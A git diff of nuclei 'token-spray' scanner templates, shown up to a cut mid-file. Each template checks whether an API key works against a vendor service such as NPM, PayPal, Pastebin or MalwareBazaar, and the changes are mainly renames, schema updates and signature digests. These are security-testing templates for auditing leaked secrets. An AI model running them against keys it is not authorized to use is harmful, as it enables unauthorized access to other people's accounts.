4a0a00473045022059ba18b8d17fc3603d02f111b48fdc488776904846a5a670916ef5910158d0f30221008808cf1122a8d79312a459b7a53df6bb553bb4c9419cc2d5dea3ae9ef558b51e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-leanix.yaml b/nuclei-templates/Other/api-leanix-450.yaml similarity index 100% rename from nuclei-templates/Other/api-leanix.yaml rename to nuclei-templates/Other/api-leanix-450.yaml diff --git a/nuclei-templates/Other/api-lob.yaml b/nuclei-templates/Other/api-lob.yaml index acdb6a64d8..84a6e8051e 100644 --- a/nuclei-templates/Other/api-lob.yaml +++ b/nuclei-templates/Other/api-lob.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.lob.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/lob + metadata: + max-request: 1 tags: token-spray,lob self-contained: true -requests: + +http: - raw: - | GET https://api.lob.com/v1/addresses HTTP/1.1 @@ -25,4 +28,6 @@ requests: - '"id"' - '"description"' - '"name"' - condition: and \ No newline at end of file + condition: and + +# digest: 490a004630440220718f49d6c4df40b412ede0b5cb39f6cdb82f0af3dd0b78300c3691a2e79c729f0220739f62fadcce15febe9ddeb29a395d56bca04cb30becd76c180499854fdec7b3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-lokalise.yaml b/nuclei-templates/Other/api-lokalise-452.yaml similarity index 100% rename from nuclei-templates/Other/api-lokalise.yaml rename to nuclei-templates/Other/api-lokalise-452.yaml diff --git a/nuclei-templates/Other/api-mac-address-lookup.yaml b/nuclei-templates/Other/api-mac-address-lookup.yaml index aa2f53074c..ba17df24c8 100644 --- a/nuclei-templates/Other/api-mac-address-lookup.yaml +++ b/nuclei-templates/Other/api-mac-address-lookup.yaml @@ -8,10 +8,13 @@ info: reference: - https://macaddress.io/api - https://github.com/daffainfo/all-about-apikey/tree/main/mac-address-lookup + metadata: + max-request: 1 tags: token-spray,macaddresslookup self-contained: true -requests: + +http: - method: GET path: - "https://api.macaddress.io/v1?apiKey={{token}}&output=json&search=44:38:39:ff:ef:57" @@ -24,3 +27,5 @@ requests: - '"companyName"' - '"companyAddress"' condition: and + +# digest: 490a00463044022077f9c79db05e4de64f4145cc0e554af042df0423c199825f3d6ec8cfc5951c2a022063e9ebc8dfa585d7c79d251563fb852897b8c1696eb495158a519eac7dbcbf83:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-mailchimp.yaml b/nuclei-templates/Other/api-mailchimp.yaml deleted file mode 100644 index 9d7073e46c..0000000000 --- a/nuclei-templates/Other/api-mailchimp.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-mailchimp - -info: - name: Mailchimp API Test - author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration - severity: info - tags: token-spray,mailchimp - -network: - - inputs: - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.mandrillapp.com:465" - - matchers: - - type: word - words: - - "success" diff --git a/nuclei-templates/Other/api-malshare-457.yaml b/nuclei-templates/Other/api-malshare.yaml similarity index 100% rename from nuclei-templates/Other/api-malshare-457.yaml rename to nuclei-templates/Other/api-malshare.yaml diff --git a/nuclei-templates/Other/api-malwarebazaar-458.yaml b/nuclei-templates/Other/api-malwarebazaar-458.yaml new file mode 100644 index 0000000000..ce99bd0a43 --- /dev/null +++ b/nuclei-templates/Other/api-malwarebazaar-458.yaml @@ -0,0 +1,40 @@ +id: api-malwarebazaar + +info: + name: MalwareBazaar API Test + author: daffainfo + severity: info + reference: + - https://bazaar.abuse.ch/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar + +self-contained: true +requests: + - raw: + - | + POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 + Host: mb-api.abuse.ch + API-KEY: {{token}} + Content-Length: 0 + Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 + + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="json_data" + Content-Type: application/json + + {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="file"; filename="1.txt" + + dssd + + --545d0ca717a743c3bd4fa575585f74c6-- + + matchers: + - type: word + part: body + words: + - '"query_status": "inserted"' + - '"query_status": "file_already_known"' + condition: or diff --git a/nuclei-templates/Other/api-malwarebazaar.yaml b/nuclei-templates/Other/api-malwarebazaar.yaml deleted file mode 100644 index f261796b92..0000000000 --- a/nuclei-templates/Other/api-malwarebazaar.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: api-malwarebazaar - -info: - name: MalwareBazaar API Test - author: daffainfo - severity: info - reference: - - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md - tags: token-spray,malwarebazaar - -self-contained: true -requests: - - raw: - - | - POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 - Host: mb-api.abuse.ch - API-KEY: {{token}} - Content-Length: 0 - Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 - - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="json_data" - Content-Type: application/json - - {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="file"; filename="1.txt" - - dssd - - --545d0ca717a743c3bd4fa575585f74c6-- - - matchers: - - type: word - part: body - words: - - '"query_status": "inserted"' - - '"query_status": "file_already_known"' - condition: or diff --git a/nuclei-templates/Other/mapbox.yaml b/nuclei-templates/Other/api-mapbox-465.yaml similarity index 100% rename from nuclei-templates/Other/mapbox.yaml rename to nuclei-templates/Other/api-mapbox-465.yaml diff --git a/nuclei-templates/Other/api-mojoauth-466.yaml b/nuclei-templates/Other/api-mojoauth-466.yaml new file mode 100644 index 0000000000..f6cafe6873 --- /dev/null +++ b/nuclei-templates/Other/api-mojoauth-466.yaml @@ -0,0 +1,26 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/nuclei-templates/Other/api-mojoauth.yaml b/nuclei-templates/Other/api-mojoauth.yaml deleted file mode 100644 index db56c9a9bc..0000000000 --- a/nuclei-templates/Other/api-mojoauth.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - tags: token-spray,mojoauth - -self-contained: true -requests: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and diff --git a/nuclei-templates/Other/api-monday.yaml b/nuclei-templates/Other/api-monday.yaml index 8f4a8df402..051d37980a 100644 --- a/nuclei-templates/Other/api-monday.yaml +++ b/nuclei-templates/Other/api-monday.yaml @@ -8,10 +8,13 @@ info: reference: - https://api.developer.monday.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/monday + metadata: + max-request: 1 tags: token-spray,monday self-contained: true -requests: + +http: - raw: - | POST https://api.monday.com/v2 HTTP/1.1 @@ -29,3 +32,5 @@ requests: - '"name"' - '"account_id"' condition: and + +# digest: 4b0a00483046022100fecab9ebd8eaad24f05d6b7475b2383f3f088324f3a32899cfe6ae32e4dfb536022100d440bebd6717e33c5ee3d388f67e27db8bebb40f9883513e9d95029c7d710e0d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-moonpay.yaml b/nuclei-templates/Other/api-moonpay.yaml index a7ec6a7d0d..c056f8768a 100644 --- a/nuclei-templates/Other/api-moonpay.yaml +++ b/nuclei-templates/Other/api-moonpay.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://dashboard.moonpay.com/getting_started + metadata: + max-request: 1 tags: token-spray,moonpay,cryptocurrencies self-contained: true -requests: + +http: - method: GET path: - "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1" @@ -20,3 +23,5 @@ requests: words: - '"accountId":' condition: and + +# digest: 4a0a0047304502210083a75b4859654813b629aa8a80ed9e99485c055b1604df425a543964b29c4bc00220054f9b7d5e4d105454b682739477035d7dadf0aa6e499f56626c1f17c7011c3f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-mywot-467.yaml b/nuclei-templates/Other/api-mywot-467.yaml deleted file mode 100644 index 2440afe842..0000000000 --- a/nuclei-templates/Other/api-mywot-467.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-mywot - -info: - name: My Web of Trust API - author: daffainfo - severity: info - reference: - - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md - tags: token-spray,weboftrust - -self-contained: true -requests: - - raw: - - | - GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 - Host: scorecard.api.mywot.com - x-user-id: {{id}} - x-api-key: {{token}} - - matchers: - - type: word - part: body - words: - - '"target":' - - '"safety":' - condition: and diff --git a/nuclei-templates/Other/api-mywot.yaml b/nuclei-templates/Other/api-mywot.yaml new file mode 100644 index 0000000000..7256c5d9e8 --- /dev/null +++ b/nuclei-templates/Other/api-mywot.yaml @@ -0,0 +1,27 @@ +id: api-mywot + +info: + name: My Web of Trust API + author: daffainfo + severity: info + reference: + - https://support.mywot.com/hc/en-us/sections/360004477734-API- + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md + tags: token-spray,weboftrust + +self-contained: true +requests: + - raw: + - | + GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 + Host: scorecard.api.mywot.com + x-user-id: {{id}} + x-api-key: {{token}} + + matchers: + - type: word + part: body + words: + - '"target":' + - '"safety":' + condition: and diff --git a/nuclei-templates/Other/api-networksdb.yaml b/nuclei-templates/Other/api-networksdb.yaml index 862e63f04c..f57ec2b90c 100644 --- a/nuclei-templates/Other/api-networksdb.yaml +++ b/nuclei-templates/Other/api-networksdb.yaml @@ -29,3 +29,5 @@ http: - '"req_limit":' - '"resets_at":' condition: and + +# digest: 4a0a0047304502200f979f0111e0d4ef90fdf45bd27494b0939f4d57f146edf68329780072821763022100aabb25ee79551fb00c76cb58929d26a8dd93a1ef3b6832a88e74890602aa6bb7:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-newrelic.yaml b/nuclei-templates/Other/api-newrelic.yaml index 3f650a1a87..f982297388 100644 --- a/nuclei-templates/Other/api-newrelic.yaml +++ b/nuclei-templates/Other/api-newrelic.yaml @@ -2,21 +2,24 @@ id: api-newrelic info: name: New Relic Rest API - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://docs.newrelic.com/docs/apis/rest-api-v2/application-examples-v2/list-your-app-id-metric-timeslice-data-v2 metadata: verified: true + max-request: 1 tags: token-spray,newrelic self-contained: true -requests: + +http: - raw: - | GET https://api.newrelic.com/v2/applications.json HTTP/1.1 Host: api.newrelic.com Api-Key: {{token}} + matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"application.servers":' - '"application.application_hosts":' condition: and + +# digest: 490a004630440220284f3670a18491fd97725bacd86222377d2f015639a8bd015596407ae505d5a50220124c0c9e58dfc8c73bf218bf6a7277639e628a2f44b0defa6383e87831ebf10a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-notolytix.yaml b/nuclei-templates/Other/api-notolytix.yaml index c5531fc816..bb16495dae 100644 --- a/nuclei-templates/Other/api-notolytix.yaml +++ b/nuclei-templates/Other/api-notolytix.yaml @@ -28,3 +28,5 @@ http: - 'deviceId":' - 'personaId":' condition: and + +# digest: 490a0046304402202a263a22125b371bcf0ca9c8bf5641d8a0edd05086c2ef1213d58a4f8c9acb6702203da88b2a52cb6133f9e2e91743049c19f9dbeaaf4bdded12e213d2bb850e77db:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-npm-471.yaml b/nuclei-templates/Other/api-npm-471.yaml new file mode 100644 index 0000000000..a1e3db47b4 --- /dev/null +++ b/nuclei-templates/Other/api-npm-471.yaml @@ -0,0 +1,19 @@ +id: api-npm +info: + name: NPM API Test + author: zzeitlin + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + severity: info + tags: token-spray,node,npm,package,manager +requests: + - method: GET + path: + - "https://registry.npmjs.org/-/whoami" + headers: + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + - 403 + negative: true diff --git a/nuclei-templates/Other/api-npm.yaml b/nuclei-templates/Other/api-npm.yaml deleted file mode 100644 index 522c793520..0000000000 --- a/nuclei-templates/Other/api-npm.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-npm - -info: - name: NPM API Test - author: zzeitlin - severity: info - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens - tags: token-spray,node,npm - -self-contained: true -requests: - - method: GET - path: - - "https://registry.npmjs.org/-/whoami" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 401 - - 403 - negative: true diff --git a/nuclei-templates/Other/api-nytimes.yaml b/nuclei-templates/Other/api-nytimes.yaml index 5743e5817b..1778476446 100644 --- a/nuclei-templates/Other/api-nytimes.yaml +++ b/nuclei-templates/Other/api-nytimes.yaml @@ -7,10 +7,13 @@ info: description: NYTimes API Test reference: - https://developer.nytimes.com/apis + metadata: + max-request: 1 tags: token-spray,nytimes self-contained: true -requests: + +http: - raw: - | GET https://api.nytimes.com/svc/mostpopular/v2/shared/1.json?api-key={{token}} HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"copyright":' - '"num_results":' condition: and + +# digest: 4a0a0047304502201bd511ce9cbbdca3808df5a709dd89e39be2675caabaf0cb130068f2d7e03b4a022100d120a5cff52c46205182341cf35d529a3a264c93f3325d7dc20ab75787808039:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-open-page-rank.yaml b/nuclei-templates/Other/api-open-page-rank.yaml index 86312c9bbc..a2e3eecd9c 100644 --- a/nuclei-templates/Other/api-open-page-rank.yaml +++ b/nuclei-templates/Other/api-open-page-rank.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.domcop.com/openpagerank/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/open-page-rank + metadata: + max-request: 1 tags: token-spray,openpagerank self-contained: true -requests: + +http: - raw: - | GET https://openpagerank.com/api/v1.0/getPageRank?domains[]=google.com HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"page_rank_decimal"' - '"rank"' condition: and + +# digest: 4a0a00473045022100a24cf8506b2bcd21a59c324234f93d103ed7ba7623b5c9cffa79eaa8842e0baf02203b7574186a94356c304ce062fbf5be6822c0d48d2dc17137b9a2fd6d8a76855a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-opengraphr.yaml b/nuclei-templates/Other/api-opengraphr.yaml index e2a071e100..3ad4395acb 100644 --- a/nuclei-templates/Other/api-opengraphr.yaml +++ b/nuclei-templates/Other/api-opengraphr.yaml @@ -8,10 +8,13 @@ info: reference: - https://opengraphr.com/docs/1.0/overview - https://github.com/daffainfo/all-about-apikey/tree/main/opengraphr + metadata: + max-request: 1 tags: token-spray,opengraphr self-contained: true -requests: + +http: - method: GET path: - "https://api.opengraphr.com/v1/og?api_token={{token}}&url=https://google.com" @@ -24,3 +27,5 @@ requests: - '"image"' - '"url"' condition: and + +# digest: 4a0a004730450221009a52105506cd5d4aa2903f3e86fb9013b695340758753a1e1d65a85dac5a7ffc02205e5b248c5b1c98ee496e8e2e6da109d745fa76f398d42672062cdfb8820b12eb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-openweather-473.yaml b/nuclei-templates/Other/api-openweather-473.yaml index 1a9a5058e3..158ddb3ccf 100644 --- a/nuclei-templates/Other/api-openweather-473.yaml +++ b/nuclei-templates/Other/api-openweather-473.yaml @@ -1,17 +1,14 @@ id: api-openweather - info: name: OpenWeather API Test author: zzeitlin reference: https://openweathermap.org/current severity: info tags: token-spray,weather,openweather - requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - matchers: - type: status status: diff --git a/nuclei-templates/Other/api-opsgenie.yaml b/nuclei-templates/Other/api-opsgenie.yaml index 633d5d17a1..cdd4b9fa8e 100644 --- a/nuclei-templates/Other/api-opsgenie.yaml +++ b/nuclei-templates/Other/api-opsgenie.yaml @@ -2,21 +2,24 @@ id: api-opsgenie info: name: OpsGenie API Test - author: 0xlittleboy + author: 0xpugazh severity: info description: Forex currency market data reference: - https://docs.opsgenie.com/docs/api-overview + metadata: + max-request: 1 tags: token-spray,opsgenie self-contained: true -requests: + +http: - method: GET path: - "https://api.opsgenie.com/v2/alerts" + headers: Authorization: GenieKey {{token}} - matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"paging":' - '"took":' condition: and + +# digest: 4a0a00473045022100c50a581654d857a35a2fb9ebc7b2fab2867fc09f99679fd67fc1fe517655aa33022034c075dcfab67ff1836e5e772207cd79a24dd04ba66a5d240c9063fc3e2d4483:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pagecdn.yaml b/nuclei-templates/Other/api-pagecdn.yaml index 61a332f1ea..2517a54744 100644 --- a/nuclei-templates/Other/api-pagecdn.yaml +++ b/nuclei-templates/Other/api-pagecdn.yaml @@ -8,10 +8,13 @@ info: reference: - https://pagecdn.com/docs/public-api - https://github.com/daffainfo/all-about-apikey/tree/main/pagecdn + metadata: + max-request: 1 tags: token-spray,pagecdn self-contained: true -requests: + +http: - method: GET path: - "https://pagecdn.com/api/v2/private/account/info?apikey={{token}}" @@ -23,3 +26,5 @@ requests: - '"username"' - '"email"' condition: and + +# digest: 490a00463044022034ccfc3761571875058b3cb12eeb8206af0af10d6407416b430d5cf40d1d3ced022024c880405b2dcaea2abd4c77c58c90c40b2f0c55cdc6daa13da28bf146289779:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pastebin-477.yaml b/nuclei-templates/Other/api-pastebin-477.yaml deleted file mode 100644 index 143f639fb1..0000000000 --- a/nuclei-templates/Other/api-pastebin-477.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-pastebin - -info: - name: Pastebin API Test - author: daffainfo - severity: info - reference: - - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md - tags: token-spray,pastebin - -self-contained: true -requests: - - raw: - - | - POST https://pastebin.com/api/api_post.php HTTP/1.1 - Host: pastebin.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - api_dev_key={{token}}&api_paste_code=test&api_option=paste - - matchers: - - type: word - part: body - words: - - 'https://pastebin.com/' diff --git a/nuclei-templates/Other/api-pastebin.yaml b/nuclei-templates/Other/api-pastebin.yaml new file mode 100644 index 0000000000..ab46ebbc09 --- /dev/null +++ b/nuclei-templates/Other/api-pastebin.yaml @@ -0,0 +1,28 @@ +id: api-pastebin + +info: + name: Pastebin API Test + author: daffainfo + severity: info + description: Plain Text Storage + reference: + - https://pastebin.com/doc_api + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin + tags: token-spray,pastebin + +self-contained: true +requests: + - raw: + - | + POST https://pastebin.com/api/api_post.php HTTP/1.1 + Host: pastebin.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + api_dev_key={{token}}&api_paste_code=test&api_option=paste + + matchers: + - type: word + part: body + words: + - 'https://pastebin.com/' diff --git a/nuclei-templates/Other/api-paypal.yaml b/nuclei-templates/Other/api-paypal-478.yaml similarity index 100% rename from nuclei-templates/Other/api-paypal.yaml rename to nuclei-templates/Other/api-paypal-478.yaml diff --git a/nuclei-templates/Other/api-pdflayer.yaml b/nuclei-templates/Other/api-pdflayer.yaml index 141841d77c..55f49e8c69 100644 --- a/nuclei-templates/Other/api-pdflayer.yaml +++ b/nuclei-templates/Other/api-pdflayer.yaml @@ -8,10 +8,13 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/pdflayer + metadata: + max-request: 1 tags: token-spray,pdflayer self-contained: true -requests: + +http: - raw: - | GET https://api.pdflayer.com/api/convert?access_key={{token}}&document_url=https://test.test HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"document_url_not_found"' - '"The document URL you specified was not found.' condition: and + +# digest: 490a00463044022041b3237526765cd6d77fe6ef1155a25ac46dafb4dc0ab47fb6c9ef12072776150220518950d7ce32576b7411e66b71101696a595efae08e6f287beeeb877a3ee892c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pendo.yaml b/nuclei-templates/Other/api-pendo.yaml index 8ea141bcc0..023a6f347c 100644 --- a/nuclei-templates/Other/api-pendo.yaml +++ b/nuclei-templates/Other/api-pendo.yaml @@ -3,21 +3,23 @@ id: api-pendo info: name: Pendo API Test author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html severity: info + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo +self-contained: true requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: - - type: status - status: - - 403 - negative: true \ No newline at end of file + - type: word + part: body + words: + - '"createdByUser":' + - '"id":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-petfinder-480.yaml b/nuclei-templates/Other/api-petfinder-480.yaml deleted file mode 100644 index 17fd3a85c3..0000000000 --- a/nuclei-templates/Other/api-petfinder-480.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/nuclei-templates/Other/api-petfinder.yaml b/nuclei-templates/Other/api-petfinder.yaml new file mode 100644 index 0000000000..ae0b6866a1 --- /dev/null +++ b/nuclei-templates/Other/api-petfinder.yaml @@ -0,0 +1,31 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and diff --git a/nuclei-templates/Other/pivotaltracker.yaml b/nuclei-templates/Other/api-pivotaltracker-482.yaml similarity index 100% rename from nuclei-templates/Other/pivotaltracker.yaml rename to nuclei-templates/Other/api-pivotaltracker-482.yaml diff --git a/nuclei-templates/Other/postmark.yaml b/nuclei-templates/Other/api-postmark-483.yaml similarity index 100% rename from nuclei-templates/Other/postmark.yaml rename to nuclei-templates/Other/api-postmark-483.yaml diff --git a/nuclei-templates/Other/api-prexview.yaml b/nuclei-templates/Other/api-prexview.yaml index 8d9b95589b..93bf2b30dc 100644 --- a/nuclei-templates/Other/api-prexview.yaml +++ b/nuclei-templates/Other/api-prexview.yaml @@ -8,10 +8,13 @@ info: reference: - https://prexview.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/prexview + metadata: + max-request: 1 tags: token-spray,prexview self-contained: true -requests: + +http: - raw: - | POST https://api.prexview.com/v1/transform HTTP/1.1 @@ -25,3 +28,5 @@ requests: - '"output is a required argument"' - '"status":400' condition: and + +# digest: 4b0a00483046022100bc565ad6d829c472e911c51e70fad26057dbc794dabf992a127d9f992c8b767f022100a21795f9f28f7f967d5abad13d87a437777d96b5851ceea6cf9a2c875c1eb4e8:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-proxycrawl.yaml b/nuclei-templates/Other/api-proxycrawl.yaml index 37e1821aa5..23a82cb10f 100644 --- a/nuclei-templates/Other/api-proxycrawl.yaml +++ b/nuclei-templates/Other/api-proxycrawl.yaml @@ -8,10 +8,13 @@ info: reference: - https://proxycrawl.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/proxycrawl + metadata: + max-request: 1 tags: token-spray,proxycrawl self-contained: true -requests: + +http: - method: GET path: - "https://api.proxycrawl.com/leads?token={{token}}&domain=www.amazon.com" @@ -24,3 +27,5 @@ requests: - '"domain"' - '"leads"' condition: and + +# digest: 490a004630440220088997cfa194d9f7e61db56502b823b07527adc1a245f4febe1ca37e88d76456022051c7378b301dac88738df762caee87a477a0d1336fd3b7b0ddbe370b9e65c43c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-proxykingdom.yaml b/nuclei-templates/Other/api-proxykingdom.yaml index 35ddc84301..fa9ec48daa 100644 --- a/nuclei-templates/Other/api-proxykingdom.yaml +++ b/nuclei-templates/Other/api-proxykingdom.yaml @@ -8,10 +8,13 @@ info: reference: - https://proxykingdom.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/proxykingdom + metadata: + max-request: 1 tags: token-spray,proxykingdom self-contained: true -requests: + +http: - method: GET path: - "https://api.proxykingdom.com/proxy?token={{token}}" @@ -24,3 +27,5 @@ requests: - '"port"' - '"protocol"' condition: and + +# digest: 4b0a00483046022100caa9d7312c7246651127f8ea95b26e9a637e3219288ac8761696c928959f27ed022100b088f447706a1c6643530d00de0ca2d254703dacef21a7e945d7853a4ea3fb7e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-rijksmuseum-486.yaml b/nuclei-templates/Other/api-rijksmuseum-486.yaml new file mode 100644 index 0000000000..6e6c1c40cd --- /dev/null +++ b/nuclei-templates/Other/api-rijksmuseum-486.yaml @@ -0,0 +1,25 @@ +id: api-rijksmuseum + +info: + name: Rijksmuseum API Test + author: daffainfo + severity: info + reference: + - https://data.rijksmuseum.nl/user-generated-content/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md + tags: token-spray,rijksmuseum + +self-contained: true +requests: + - method: GET + path: + - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" + + matchers: + - type: word + part: body + words: + - '"count":' + - '"userSets":' + - '"user":' + condition: and diff --git a/nuclei-templates/Other/api-rijksmuseum.yaml b/nuclei-templates/Other/api-rijksmuseum.yaml deleted file mode 100644 index 11327595a7..0000000000 --- a/nuclei-templates/Other/api-rijksmuseum.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-rijksmuseum - -info: - name: Rijksmuseum API Test - author: daffainfo - severity: info - reference: - - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md - tags: token-spray,rijksmuseum - -self-contained: true -requests: - - method: GET - path: - - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" - - matchers: - - type: 